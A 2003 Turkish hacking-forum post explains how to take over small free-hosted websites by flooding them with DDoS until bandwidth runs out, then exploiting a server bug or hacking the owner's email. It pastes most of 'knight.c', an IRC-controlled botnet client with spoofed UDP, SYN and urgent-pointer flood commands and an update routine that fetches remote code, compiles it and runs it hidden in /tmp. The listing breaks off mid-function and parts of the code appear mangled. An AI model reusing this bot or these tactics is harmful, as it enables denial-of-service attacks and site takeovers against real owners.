folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Freeserversdaki Siteleri Hacklemek İçin Döküman Burda By VampireFreeserversdaki Siteleri Hacklemek İçin Döküman Burda By Vampire

 1. KısayolKısayol reportŞikayet pmÖzel Mesaj
  vampire
  vampire's avatar
  Kayıt Tarihi: 18/Eylül/2003
  Erkek
  beyler freeserversdan alınan bedava sitleri hacklemek için ilk başladığımda
  bir yöntem denemiştim oldu şimdide o yöntemi yazıya döküyorum kolay gelsin

  şidmi freeserversda site alanları küçük dolayısı ile badwichlerde orantılı olarak azdır şidmi siz herhangi bir siteye ddos saldırısı yaparsanız mecburen
  bir süre sonra bandwichleri dolacak site avaible olacak siz saldırıya bu aşamadan sonra devam ederseniz işte o zaman serverlarda var olan bir bug
  sayesidne siteye giriş yapmaya çalıştığınızda sitenin dosyaları önünüzde
  bundan sonrası zaten basit fakat burda bu yöntemi kullanmak için exploitlerden anlamınız gerkli ve verdiğim exploiti kullamnız lazım yoksa avucunuzu yalarsınız kolay gelsin . ayrıca site sahibin mailini hackeleyrekte siteyi ele
  geçirirsiniz zaten bunu yazmama gerek yok

  tarafımdan yazılmıştır cp yapın fakat kendi adınızı yazmayın


  vampire 2003


  kullanacağınız exploitler

  knight.c


  /*
  * This code is a very good DDoS program. Its used to test firewalls or some shit
  * like that. Yea, that sounds good. And for education purposes. So its not my
  * fault if you do some other naughty shit with this code.
  *
  * This program goes on IRC and waits in a channel accepting your commands.
  *
  * Edit those #defines down there cause you probably dont wanna use my default
  * info. When it gets on IRC, you can send it the HELP command, prefixed with
  * the CONTROL_CHAR (which by default is @). So it would be something like
  * @HELP. Then it will send back info on all the exploits this knight has.
  *
  * BTW: I dont use comments, sorry.
  *
  * -bysin
  */

  // This is the channel name
  #define CHAN "#@stuff@"
  // This is the key for the channel
  #define KEY "blah"
  // This is the port of the irc servers
  #define PORT 6667
  // This is the timeout to wait
  #define TIMEOUT 30
  // This is the character used to control the net
  #define CONTROL_CHAR "@"

  // This is the number of servers in the list
  int numservers=12;
  // This is the list of servers
  char *servers[] = {
  "irc.emory.edu",
  "irc.ins.net.uk",
  "irc.lightning.net",
  "irc.gigabell.de",
  "irc.mcs.net",
  "irc.freebsd.org",
  "irc.east.gblx.net",
  "irc.west.gblx.net",
  "irc.plur.net",
  "irc.light.se",
  "irc.du.se",
  "irc.stanford.edu",
  (void*)0
  };

  ////////////////////////////////////////////////////////////////
  // Dont edit these //
  ////////////////////////////////////////////////////////////////

  #include <stdarg.h>
  #include <errno.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  #include <strings.h>
  #include <netinet/in.h>
  #include <unistd.h>
  #include <sys/time.h>
  #include <sys/socket.h>
  #include <signal.h>
  #include <arpa/inet.h>
  #include <netdb.h>
  #include <time.h>
  #include <sys/wait.h>

  int *pids, csum=0, actualparent;
  char *nick, disabled=0, execfile[256];
  unsigned long spoofs=0, spoofsm=0, numpids=0;
  int mfork() {
  int parent;
  if (disabled == 1) return disabled;
  parent=fork();
  if (parent <= 0) return parent;
  numpids++;
  pids=(int*)realloc(pids,numpids);
  pids[numpids-1]=parent;
  return parent;
  }
  unsigned long getspoof() {
  if (!spoofs) return rand();
  if (spoofsm == 1) return ntohl(spoofs);
  return ntohl(spoofs+(rand() % spoofsm)+1);
  }
  void filter(char *a) {
  while(a[strlen(a)-1] == "\r" || a[strlen(a)-1] == "\n") a[strlen(a)-1]=0;
  }
  long pow(long a, long b) {
  if (b == 0) return 1;
  if (b == 1) return a;
  return a*pow(a,b-1);
  }
  u_short in_cksum(u_short *addr, int len) {
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer =0;
  if (!csum) return rand();
  while (nleft > 1) {
  sum += *w++;
  nleft -= 2;
  }
  if (nleft == 1) {
  *(u_char *)(&answer) = *(u_char *)w;
  sum += answer;
  }
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return(answer);
  }
  int Send(int sock, char *words, ...) {
  static char textBuffer[1024];
  va_list args;
  va_start(args, words);
  vsprintf(textBuffer, words, args);
  va_end(args);
  return write(sock,textBuffer,strlen(textBuffer));
  }
  void checksum(int sock, char *sender, int argc, char **argv) {
  if (argc != 1) {
  Send(sock,"NOTICE %s :CHECKSUM <on/off>\n",sender);
  return;
  }
  if (!strcmp(argv[1],"on")) {
  Send(sock,"NOTICE %s :Checksum has been turned on.\n",sender);
  csum=1;
  }
  else {
  Send(sock,"NOTICE %s :Checksum has been turned off.\n",sender);
  csum=0;
  }
  }
  void dns(int sock, char *sender, int argc, char **argv) {
  struct hostent *hostm;
  struct in_addr m;
  if (mfork() != 0) return;
  if (argc != 1) {
  Send(sock,"NOTICE %s :DNS <host>\n",sender);
  exit(0);
  }
  Send(sock,"NOTICE %s :Resolving %s...\n",sender,argv[1]);
  if ((hostm=gethostbyname(argv[1])) == NULL) {
  Send(sock,"NOTICE %s :Unable to resolve.\n",sender);
  exit(0);
  }
  memcpy((char*)&m, hostm->h_addr, hostm->h_length);
  Send(sock,"NOTICE %s :Resolved to %s.\n",sender,inet_ntoa(m));
  exit(0);
  }
  void getspoofs(int sock, char *sender, int argc, char **argv) {
  unsigned long a=spoofs;
  unsigned long b=(spoofsm+spoofs)-1;
  if (spoofsm == 1) Send(sock,"NOTICE %s :%d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
  else Send(sock,"NOTICE %s :%d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
  }
  void version(int sock, char *sender, int argc, char **argv) {
  Send(sock,"NOTICE %s :Knights 2002\n",sender);
  }
  void nickc(int sock, char *sender, int argc, char **argv) {
  if (argc != 1) {
  Send(sock,"NOTICE %s :NICK <nick>\n",sender);
  return;
  }
  if (strlen(argv[1]) > 10) {
  Send(sock,"NOTICE %s :Nick cannot be larger than 10 characters.\n",sender);
  return;
  }
  nick=strdup(argv[1]);
  Send(sock,"NICK %s\n",nick);
  }
  void disable(int sock, char *sender, int argc, char **argv) {
  disabled=1;
  }
  void enable(int sock, char *sender, int argc, char **argv) {
  disabled=0;
  }
  void spoof(int sock, char *sender, int argc, char **argv) {
  char ip[256];
  int i, num;
  unsigned long uip;
  if (argc != 1) {
  Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
  spoofs=0;
  spoofsm=0;
  return;
  }
  if (strlen(argv[1]) > 16) {
  Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
  return;
  }
  strcpy(ip,argv[1]);
  if (ip[strlen(ip)-1] == ".") ip[strlen(ip)-1] = 0;
  for (i=0, num=1;i<strlen(ip);i++) if (ip == ".") num++;
  num=-(num-4);
  for (i=0;i<num;i++) strcat(ip,".0");
  uip=inet_network(ip);
  if (num == 0) spoofsm=1;
  else spoofsm=pow(256,num);
  spoofs=uip;
  }
  struct iphdr {
  unsigned int ihl:4;
  unsigned int version:4;
  unsigned char tos;
  unsigned int tot_len;
  unsigned int id;
  unsigned int frag_off;
  unsigned char ttl;
  unsigned char protocol;
  unsigned int check;
  unsigned long saddr;
  unsigned long daddr;
  };
  struct ip {
  unsigned int ip_hl:4;
  unsigned int ip_v:4;
  unsigned char ip_tos;
  unsigned short ip_len;
  unsigned short ip_id;
  unsigned short ip_off;
  unsigned char ip_ttl;
  unsigned char ip_p;
  unsigned short ip_sum;
  struct in_addr ip_src, ip_dst;
  };
  struct udphdr_ {
  unsigned short source;
  unsigned short dest;
  unsigned short len;
  unsigned short check;
  };
  void bysin(int sock, char *sender, int argc, char **argv) {
  unsigned int secs,port,i=0;
  unsigned long psize,target;
  struct sockaddr_in s_in;
  struct packet {
  struct ip ip;
  struct udphdr_ udp;
  char *buf;
  } packet;
  int get;
  time_t start=time(NULL);
  if (mfork() != 0) return;
  if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  if (argc < 3) {
  Send(sock,"NOTICE %s :BYSIN <target> <port> <secs>\n",sender);
  exit(1);
  }
  target = inet_addr(argv[1]);
  port = atoi(argv[2]);
  secs = atoi(argv[3]);
  psize = 1500-(sizeof(struct ip)+sizeof(struct udphdr_));
  packet.buf=(unsigned char*)malloc(psize);
  memset(packet.buf,10,psize);
  Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]);
  packet.ip.ip_hl = 5;
  packet.ip.ip_v = 4;
  packet.ip.ip_tos = 0;
  packet.ip.ip_len = 1500;
  packet.ip.ip_off = 0;
  packet.ip.ip_p = 17;
  packet.ip.ip_ttl = 64;
  packet.ip.ip_dst.s_addr = target;
  packet.udp.len = htons(psize);
  s_in.sin_family = AF_INET;
  s_in.sin_addr.s_addr = target;
  for (; {
  packet.udp.source = rand();
  if (port) packet.udp.dest = htons(port);
  else packet.udp.dest = rand();
  packet.udp.check = in_cksum((u_short *)&packet,1500);
  packet.ip.ip_src.s_addr = getspoof();
  packet.ip.ip_id = rand();
  packet.ip.ip_sum = in_cksum((u_short *)&packet,1500);
  s_in.sin_port = packet.udp.dest;
  sendto(get,(char*)&packet,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
  if (i >= 50) {
  if (time(NULL) >= start+secs) exit(0);
  i=0;
  }
  i++;
  }
  }
  struct tcphdr_ {
  unsigned int th_sport;
  unsigned int th_dport;
  unsigned int th_seq;
  unsigned int th_ack;
  unsigned char th_x2:4;
  unsigned char th_off:4;
  unsigned char th_flags;
  unsigned int th_win;
  unsigned int th_sum;
  unsigned int th_urp;
  };
  #define PACKETSIZE (sizeof(struct ip) + sizeof(struct tcphdr_))
  struct ip *ip;
  struct tcphdr_ *tcp_;
  struct sockaddr_in s_in;
  unsigned char packet[PACKETSIZE];
  int get;
  unsigned long target;
  unsigned long getaddr(char *hostname) {
  struct hostent *hp;
  if ((hp = gethostbyname(hostname)) == NULL) exit(1);
  return *(u_long *)hp->h_addr;
  }
  void makepacket(void) {
  memset(packet, 0 , PACKETSIZE);
  ip = (struct ip *)packet;
  tcp_ = (struct tcphdr_ *) (packet+sizeof(struct ip));
  ip->ip_hl = 5;
  ip->ip_v = 4;
  ip->ip_tos = 0;
  ip->ip_len = htons(PACKETSIZE);
  ip->ip_off = 0;
  ip->ip_ttl = 40;
  ip->ip_p = IPPROTO_TCP;
  ip->ip_dst.s_addr = target;
  tcp_->th_flags = 0x02;
  tcp_->th_win = htons(65535);
  s_in.sin_family = AF_INET;
  s_in.sin_addr.s_addr = target;
  }
  void killm(u_int dstport) {
  ip->ip_src.s_addr = getspoof();
  ip->ip_id = random();
  tcp_->th_sport = random();
  tcp_->th_dport = htons(dstport);
  tcp_->th_seq = random();
  tcp_->th_ack = random();
  tcp_->th_sum = in_cksum((u_short *)tcp_, sizeof(struct tcphdr_));
  ip->ip_sum = in_cksum((u_short *)packet, PACKETSIZE);
  s_in.sin_port = htons(dstport);
  sendto(get,packet,PACKETSIZE,0,(struct sockaddr *)&s_in,sizeof(s_in));
  }
  void slice2(int sock, char *sender, int argc, char **argv) {
  int low,high,port,i=0;
  unsigned int secs;
  time_t start=time(NULL);
  if (mfork() != 0) return;
  if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  if (argc < 4) {
  Send(sock,"NOTICE %s :SLICE2 <destination> <lowport> <highport> <secs>\n",sender);
  exit(1);
  }
  Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]);
  target = getaddr(argv[1]);
  low = atoi(argv[2]);
  high = atoi(argv[3]);
  secs = atoi(argv[4]);
  if (low > high) {
  Send(sock,"NOTICE %s :Error in SLICE2: Low > high.\n",sender);
  exit(1);
  }
  if (low==high) {
  makepacket();
  for (; {
  killm(low);
  if (i >= 50) {
  if (time(NULL) >= start+secs) exit(0);
  i=0;
  }
  i++;
  }
  }
  makepacket();
  for (; {
  for(port = low; port <=high; port++) {
  killm(port);
  if (i >= 50) {
  if (time(NULL) >= start+secs) exit(0);
  i=0;
  }
  i++;
  }
  }
  exit(0);
  }
  struct ttcphdr {
  unsigned short source;
  unsigned short dest;
  unsigned int seq;
  unsigned int ack_seq;
  unsigned short res1:4,
  doff:4,
  fin:1,
  syn:1,
  rst:1,
  psh:1,
  ack:1,
  urg:1,
  ece:1,
  cwr:1;
  unsigned short window;
  unsigned short check;
  unsigned short urg_ptr;
  };
  struct iiphdr {
  unsigned char ihl:4, version:4;
  unsigned char tos;
  unsigned short tot_len;
  unsigned short id;
  unsigned short frag_off;
  unsigned char ttl;
  unsigned char protocol;
  unsigned short check;
  unsigned int saddr;
  unsigned int daddr;
  };
  unsigned short in_cksum2(unsigned short *ptr, int nbytes) {
  register long sum=0;
  u_short oddbyte=0;
  while (nbytes > 1) {
  sum += *ptr++;
  nbytes -= 2;
  }
  if (nbytes == 1) {
  *((u_char *) &oddbyte) = *(u_char *)ptr;
  sum += oddbyte;
  }
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return (u_short)(~sum);
  }
  unsigned int host2ip(char *hostname) {
  static struct in_addr i;
  struct hostent *h;
  if((i.s_addr = inet_addr(hostname)) == -1) {
  if((h = gethostbyname(hostname)) == NULL) {
  fprintf(stderr, "cant find %s!\n", hostname);
  exit(0);
  }
  bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
  }
  return i.s_addr;
  }
  void pan(int sock, char *sender, int argc, char **argv) {
  struct send_tcp {
  struct iiphdr ip;
  struct ttcphdr tcp;
  char buf[20];
  } send_tcp;
  struct pseudo_header {
  unsigned int source_address;
  unsigned int dest_address;
  unsigned char placeholder;
  unsigned char protocol;
  unsigned short tcp_length;
  struct ttcphdr tcp;
  char buf[20];
  } pseudo_header;
  struct sockaddr_in sin;
  unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
  unsigned int psize=20, source, dest, check;
  unsigned long saddr, daddr,secs;
  int get;
  time_t start=time(NULL);
  if (mfork() != 0) return;
  if (argc < 2) {
  Send(sock,"NOTICE %s :PAN <target> <secs>\n",sender);
  exit(1);
  }
  if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  {int i; for(i=0;i<20;i++) send_tcp.buf=(u_char)syn;}
  daddr=host2ip(argv[1]);
  secs=atol(argv[2]);
  Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
  send_tcp.ip.ihl = 5;
  send_tcp.ip.version = 4;
  send_tcp.ip.tos = 16;
  send_tcp.ip.frag_off = 64;
  send_tcp.ip.ttl = 64;
  send_tcp.ip.protocol = 6;
  send_tcp.tcp.ack_seq = 0;
  send_tcp.tcp.doff = 10;
  send_tcp.tcp.res1 = 0;
  send_tcp.tcp.cwr = 0;
  send_tcp.tcp.ece = 0;
  send_tcp.tcp.urg = 0;
  send_tcp.tcp.ack = 0;
  send_tcp.tcp.psh = 0;
  send_tcp.tcp.rst = 0;
  send_tcp.tcp.fin = 0;
  send_tcp.tcp.syn = 1;
  send_tcp.tcp.window = 30845;
  send_tcp.tcp.urg_ptr = 0;
  while(1) {
  source=rand();
  dest=rand();
  saddr=getspoof();
  send_tcp.ip.tot_len = htons(40+psize);
  send_tcp.ip.id = rand();
  send_tcp.ip.saddr = saddr;
  send_tcp.ip.daddr = daddr;
  send_tcp.ip.check = 0;
  send_tcp.tcp.source = source;
  send_tcp.tcp.dest = dest;
  send_tcp.tcp.seq = rand();
  send_tcp.tcp.check = 0;
  sin.sin_family = AF_INET;
  sin.sin_port = source;
  sin.sin_addr.s_addr = send_tcp.ip.daddr;
  send_tcp.ip.check = in_cksum2((unsigned short *)&send_tcp.ip, 20);
  check = rand();
  send_tcp.buf[9]=((char*)&check)[0];
  send_tcp.buf[10]=((char*)&check)[1];
  send_tcp.buf[11]=((char*)&check)[2];
  send_tcp.buf[12]=((char*)&check)[3];
  pseudo_header.source_address = send_tcp.ip.saddr;
  pseudo_header.dest_address = send_tcp.ip.daddr;
  pseudo_header.placeholder = 0;
  pseudo_header.protocol = IPPROTO_TCP;
  pseudo_header.tcp_length = htons(20+psize);
  bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  send_tcp.tcp.check = in_cksum2((unsigned short *)&pseudo_header, 32+psize);
  sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  if (a >= 50) {
  if (time(NULL) >= start+secs) exit(0);
  a=0;
  }
  a++;
  }
  close(get);
  exit(0);
  }
  void majin(int sock, char *sender, int argc, char **argv) {
  struct send_tcp {
  struct iiphdr ip;
  struct ttcphdr tcp;
  char buf[1440];
  } send_tcp;
  struct pseudo_header {
  unsigned int source_address;
  unsigned int dest_address;
  unsigned char placeholder;
  unsigned char protocol;
  unsigned short tcp_length;
  struct ttcphdr tcp;
  char buf[1440];
  } pseudo_header;
  struct sockaddr_in sin;
  unsigned int psize=1440, source, dest, a=0;
  unsigned long saddr, daddr, secs;
  int get;
  time_t start=time(NULL);
  if (mfork() != 0) return;
  if (argc < 2) {
  Send(sock,"NOTICE %s :MAJIN <target> <secs>\n",sender);
  exit(1);
  }
  if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  {int i; for(i=0;i<psize;i++) send_tcp.buf=(u_char)rand();}
  daddr=host2ip(argv[1]);
  secs=atol(argv[2]);
  Send(sock,"NOTICE %s :Majin"n %s.\n",sender,argv[1]);
  send_tcp.ip.ihl = 5;
  send_tcp.ip.version = 4;
  send_tcp.ip.ttl = 64;
  send_tcp.ip.protocol = 6;
  send_tcp.tcp.doff = 10;
  send_tcp.tcp.res1 = 0;
  send_tcp.tcp.cwr = 0;
  send_tcp.tcp.ece = 0;
  send_tcp.tcp.urg = 1;
  send_tcp.tcp.ack = 1;
  send_tcp.tcp.psh = 1;
  send_tcp.tcp.rst = 0;
  send_tcp.tcp.fin = 0;
  send_tcp.tcp.syn = 0;
  send_tcp.tcp.window = 30845;
  while(1) {
  source=rand();
  dest=rand();
  saddr=getspoof();
  send_tcp.ip.tot_len = htons(40+psize);
  send_tcp.ip.tos = rand()%2?16:0;
  send_tcp.ip.frag_off = rand();
  send_tcp.ip.id = rand();
  send_tcp.ip.saddr = saddr;
  send_tcp.ip.daddr = daddr;
  send_tcp.ip.check = 0;
  send_tcp.tcp.source = source;
  send_tcp.tcp.dest = dest;
  send_tcp.tcp.seq = rand();
  send_tcp.tcp.ack_seq = rand();
  send_tcp.tcp.check = 0;
  send_tcp.tcp.urg_ptr = rand();
  sin.sin_family = AF_INET;
  sin.sin_port = source;
  sin.sin_addr.s_addr = send_tcp.ip.daddr;
  send_tcp.ip.check = in_cksum2((unsigned short *)&send_tcp.ip, 20);
  pseudo_header.source_address = send_tcp.ip.saddr;
  pseudo_header.dest_address = send_tcp.ip.daddr;
  pseudo_header.placeholder = 0;
  pseudo_header.protocol = IPPROTO_TCP;
  pseudo_header.tcp_length = htons(20+psize);
  bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  send_tcp.tcp.check = in_cksum2((unsigned short *)&pseudo_header, 32+psize);
  sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  if (a >= 50) {
  if (time(NULL) >= start+secs) exit(0);
  a=0;
  }
  a++;
  }
  close(get);
  exit(0);
  }
  void update(int sock, char *sender, int argc, char **argv) {
  int sock2,sock3,i,d;
  struct sockaddr_in server;
  unsigned long ipaddr;
  unsigned int dgcc, dport;
  char buf[1024], *pos, *port;
  FILE *gcc;
  int parent=getpid();
  if (mfork() != 0) return;
  if (argc < 5) {
  Send(sock,"NOTICE %s :UPDATE <host> <port> <username> <pass> <src:bin>\n",sender);
  exit(0);
  }
  if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  Send(sock,"NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).\n",sender);
  exit(0);
  }
  server.sin_family = AF_INET;
  server.sin_port = htons(atoi(argv[2]));
  if ((ipaddr = inet_addr(argv[1])) == -1) {
  struct hostent *hostm;
  if ((hostm=gethostbyname(argv[1])) == NULL) {
  Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
  exit(0);
  }
  memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  }
  else server.sin_addr.s_addr = ipaddr;
  memset(&(server.sin_zero), 0, 8);
  if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  Send(sock,"NOTICE %s :Unable to connect to dump site.\n",sender);
  exit(0);
  }

  memset(buf,0,1024);
  recv(sock2,buf,1024,0);
  if (strncmp(buf,"220 ",4)) {
  Send(sock,"NOTICE %s :Error while logging in to dump: %s\n",sender,buf);
  exit(0);
  }
  Send(sock2,"USER %s\r\n",argv[3]);
  memset(buf,0,1024);
  recv(sock2,buf,1024,0);
  if (strncmp(buf,"331 ",4)) {
  Send(sock,"NOTICE %s :Error while logging in to dump: %s\n",sender,buf);
  exit(0);
  }
  Send(sock2,"PASS %s\r\n",argv[4]);
  memset(buf,0,1024);
  recv(sock2,buf,1024,0);
  if (strncmp(buf,"230 ",4)) {
  Send(sock,"NOTICE %s :Error while logging in to dump: %s\n",sender,buf);
  exit(0);
  }
  Send(sock2,"REST 0\r\n");
  memset(buf,0,1024);
  recv(sock2,buf,1024,0);

  gcc=popen("gcc --help","r");
  if (gcc != NULL) {
  memset(buf,0,1024);
  fgets(buf,1024,gcc);
  if (!strstr(buf,"Usage")) dgcc=0;
  else dgcc=1;
  pclose(gcc);
  } else dgcc=0;

  if (!dgcc) {
  Send(sock2,"TYPE I\r\n");
  memset(buf,0,1024);
  recv(sock2,buf,1024,0);
  if (strncmp(buf,"200 ",4)) {
  Send(sock,"NOTICE %s :GCC not found and cannot create passive binary mode: %s\n",sender,buf);
  exit(0);
  }
  }

  Send(sock2,"PASV\r\n");
  memset(buf,0,1024);
  recv(sock2,buf,1024,0);
  if (strncmp(buf,"227 ",4)) {
  Send(sock,"NOTICE %s :Error while starting passive to dump: %s\n",sender,buf);
  exit(0);
  }
  for (i=0;i<strlen(buf) && buf != "(";i++);
  pos=buf+i+1;
  filter(pos);
  if (pos[strlen(pos)-1] == ")") pos[strlen(pos)-1]=0;
  for (i=0;i<strlen(pos);i++) if (pos == ",") pos=".";
  for (d=0,i=0;i<strlen(pos);i++) {
  if (pos == ".") d++;
  if (d == 4) {
  pos=0;
  port=pos+i+1;
  break;
  }
  }
  for (i=0;i<strlen(port) && port != ".";i++);
  port=0;
  dport=(atoi(port) * 256)+atoi(port+i+1);

  for (i=0;i<strlen(argv[5]) && argv[5] != ":";i++);
  argv[5]=0;
  if (dgcc) Send(sock2,"RETR %s\r\n",argv[5]);
  else Send(sock2,"RETR %s\r\n",argv[5]+i+1);

  if ((sock3 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
  exit(0);
  }
  server.sin_family = AF_INET;
  server.sin_port = htons(dport);
  server.sin_addr.s_addr = inet_addr(pos);
  memset(&(server.sin_zero), 0, 8);
  if (connect(sock3,(struct sockaddr *)&server, sizeof(server)) != 0) {
  Send(sock,"NOTICE %s :Unable to connect to streamed dump site.\n",sender);
  exit(0);
  }
  Send(sock,"NOTICE %s :Receiving update.\n",sender);
  system("mkdir /tmp");
  if (dgcc) {
  FILE *file=fopen("/tmp/.c","wb");
  char bufm[4096];
  while(1) {
  int i;
  if ((i=recv(sock3,bufm,4096,0)) <= 0) break;
  if (i < 4096) bufm=0;
  for (d=0;d<i;d++) fputc(bufm[d],file);
  }
  fclose(file);
  memset(buf,0,4096);
  sprintf(buf,"(gcc -o %s /tmp/.c; rm -rf /tmp/.c; kill -9 %d; kill -9 %d; %s &) > /dev/null",execfile,actualparent,parent,execfile);
  }
  else {
  FILE *file=fopen("/tmp/.o","wb");
  unsigned char bufm[4096];
  while(1) {
  int i,d;
  if ((i=recv(sock3,bufm,4096,0)) <= 0) break;
  if (i < 4096) bufm=0;
  for (d=0;d<i;d++) fputc(bufm[d],file);
  }
  fclose(file);
  memset(buf,0,4096);
  sprintf(buf,"(mv /tmp/.o %s; chmod 755 %s; kill -9 %d; kill -9 %d; %s &) > /dev/null",execfile,execfile,actualparent,parent,execfile);
  }
  system(buf);
  close(sock);
  close(sock2);
  close(sock3);
  kill(9,0);
  exit(0);
  }
  void updatehttp(int sock, char *sender, int argc, char **argv) {
  int sock2,i,d;
  struct sockaddr_in server;
  unsigned long ipaddr;
  unsigned char dgcc;
  char buf[1024], *file;
  FILE *gcc;
  int parent=getpid();
  if (mfork() != 0) return;
  if (argc < 2) {
  Send(sock,"NOTICE %s :UPDATEHTTP <host> <src:bin>\n",sender);
  exit(0);
  }
  if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  Send(sock,"NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).\n",sender);
  exit(0);
  }
  server.sin_family = AF_INET;
  server.sin_port = htons(80);
  if ((ipaddr = inet_addr(argv[1])) == -1) {
  struct hostent *hostm;
  if ((hostm=gethostbyname(argv[1])) == NULL) {
  Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
  exit(0);
  }
  memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  }
  else server.sin_addr.s_addr = ipaddr;
  memset(&(server.sin_zero), 0, 8);
  if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
  exit(0);
  }

  gcc=popen("gcc --help","r");
  if (gcc != NULL) {
  memset(buf,0,1024);
  fgets(buf,1024,gcc);
  if (!strstr(buf,"Usage")) dgcc=0;
  else dgcc=1;
  pclose(gcc);
  } else dgcc=0;

  for (i=0;i<strlen(argv[2]) && argv[2] != ":";i++);
  argv[2]=0;
  if (dgcc) file=argv[2];
  else file=argv[2]+i+1;

  Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",file,argv[1]);
  Send(sock,"NOTICE %s :Receiving update.\n",sender);
  system("mkdir /tmp");
  if (dgcc) {
  FILE *file=fopen("/tmp/.c","wb");
  char bufm[4096];
  while(1) {
  int i;
  if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  if (i < 4096) bufm=0;
  for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  for (d+=4;d<i;d++) fputc(bufm[d],file);
  goto done;
  }
  }
  done:
  while(1) {
  int i;
  if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  if (i < 4096) bufm=0;
  for (d=0;d<i;d++) fputc(bufm[d],file);
  }
  fclose(file);
  memset(buf,0,4096);
  sprintf(buf,"(gcc -o %s /tmp/.c; rm -rf /tmp/.c; kill -9 %d; %s &) > /dev/null 2>&1",execfile,parent,execfile);
  }
  else {
  FILE *file=fopen("/tmp/.o","wb");
  unsigned char bufm[4096];
  while(1) {
  int i;
  if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  if (i < 4096) bufm=0;
  for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  for (d+=4;d<i;d++) fputc(bufm[d],file);
  goto done2;
  }
  }
  done2:
  while(1) {
  int i,d;
  if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  if (i < 4096) bufm=0;
  for (d=0;d<i;d++) fputc(bufm[d],file);
  }
  fclose(file);
  memset(buf,0,4096);
  sprintf(buf,"(mv /tmp/.o %s; chmod 755 %s; kill -9 %d; %s &) > /dev/null",execfile,execfile,parent,execfile);
  }
  close(sock);
  close(sock2);
  system(buf);
  kill(9,0);
  exit(0);
  }
  void help(int sock, char *sender, int argc, char **argv) {
  if (mfork() != 0) return;
  Send(sock,"NOTICE %s :This knight accepts the following commands via ctcp (with a #):\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :NICK <nick> = Changes the nick of the knight\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :GETSPOOF = Gets the current spoofing\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :UPDATEHTTP <host> <src:bin> = Downloads a update from a http\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :UPDATE <host> <port> <username> <pass> <src:bin> = Downloads a update from a dump\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :PAN <target> <secs> = An advanced syn flooder that will kill most network drivers\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :MAJIN <target> <secs> = An urgent pointer flooder\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :UDP <target> <port> <secs> = A UDP flooder\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :SLICE2 <destination> <lowport> <highport> <secs> = Slice2!\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :DNS <host> = DNSs a host\n",sender);
  sleep(2);
